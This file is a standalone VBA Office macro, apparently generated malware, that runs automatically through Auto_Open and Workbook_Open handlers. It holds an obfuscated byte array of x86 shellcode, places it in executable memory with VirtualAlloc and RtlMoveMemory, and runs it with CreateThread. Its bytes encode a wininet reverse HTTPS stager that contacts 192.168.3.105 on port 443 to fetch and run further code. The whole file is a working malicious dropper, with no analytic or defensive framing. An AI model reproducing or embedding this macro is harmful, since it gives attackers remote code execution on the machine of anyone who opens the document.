#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Uljjpfu As Long, ByVal Sebnxzj As Long, ByVal Moeqqhqls As LongPtr, Zyakfe As Long, ByVal Djrzmuein As Long, Elfx As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Njzqntz As Long, ByVal Awq As Long, ByVal Ceioo As Long, ByVal Ghh As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Rnanwqiav As LongPtr, ByRef Rqofdznh As Any, ByVal Abxsr As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Uljjpfu As Long, ByVal Sebnxzj As Long, ByVal Moeqqhqls As Long, Zyakfe As Long, ByVal Djrzmuein As Long, Elfx As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Njzqntz As Long, ByVal Awq As Long, ByVal Ceioo As Long, ByVal Ghh As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Rnanwqiav As Long, ByRef Rqofdznh As Any, ByVal Abxsr As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Tmha As Long, Hbeakvez As Variant, Gqleuo As Long
#If Vba7 Then
        Dim  Ypcjrdliv As LongPtr, Owujb As LongPtr
#Else
        Dim  Ypcjrdliv As Long, Owujb As Long
#EndIf
        Hbeakvez = Array(232,143,0,0,0,96,49,210,137,229,100,139,82,48,139,82,12,139,82,20,49,255,139,114,40,15,183,74,38,49,192,172,60,97,124,2,44,32,193,207,13,1,199,73,117,239,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,116,76,1,208,80,139,72,24,139,88,32,1,211,133,201,116,60,73,139, _
52,139,1,214,49,255,49,192,193,207,13,172,1,199,56,224,117,244,3,125,248,59,125,36,117,224,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,233,128,255,255,255,93,104,110,101,116,0,104,119,105,110,105,84, _
104,76,119,38,7,255,213,49,219,83,83,83,83,83,232,62,0,0,0,77,111,122,105,108,108,97,47,53,46,48,32,40,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,84,114,105,100,101,110,116,47,55,46,48,59,32,114,118,58,49,49,46,48,41,32,108,105,107,101,32,71,101,99,107,111, _
0,104,58,86,121,167,255,213,83,83,106,3,83,83,104,187,1,0,0,232,251,0,0,0,47,76,109,110,79,116,71,115,99,104,83,84,106,50,45,76,97,103,51,104,49,73,103,98,88,115,121,72,118,45,116,121,115,112,74,57,82,54,80,84,111,117,87,73,115,78,112,101,116,77,105,65,110,109,56,53, _
107,112,79,45,95,115,109,57,104,121,56,56,82,86,118,85,100,101,88,82,101,103,82,116,51,81,109,74,117,90,49,82,80,107,102,103,118,84,105,112,79,117,55,120,79,112,113,45,122,49,69,0,80,104,87,137,159,198,255,213,137,198,83,104,0,50,232,132,83,83,83,87,83,86,104,235,85,46,59,255, _
213,150,106,10,95,104,128,51,0,0,137,224,106,4,80,106,31,86,104,117,70,158,134,255,213,83,83,83,83,86,104,45,6,24,123,255,213,133,192,117,20,104,136,19,0,0,104,68,240,53,224,255,213,79,117,205,232,74,0,0,0,106,64,104,0,16,0,0,104,0,0,64,0,83,104,88,164,83,229,255, _
213,147,83,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139,7,1,195,133,192,117,229,88,195,95,232,107,255,255,255,49,57,50,46,49,54,56,46,51,46,49,48,53,0,187,240,181,162,86,106,0,83,255,213)

        Ypcjrdliv = VirtualAlloc(0, UBound(Hbeakvez), &H1000, &H40)
        For Gqleuo = LBound(Hbeakvez) To UBound(Hbeakvez)
                Tmha = Hbeakvez(Gqleuo)
                Owujb = RtlMoveMemory(Ypcjrdliv + Gqleuo, Tmha, 1)
        Next Gqleuo
        Owujb = CreateThread(0, 0, Ypcjrdliv, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub
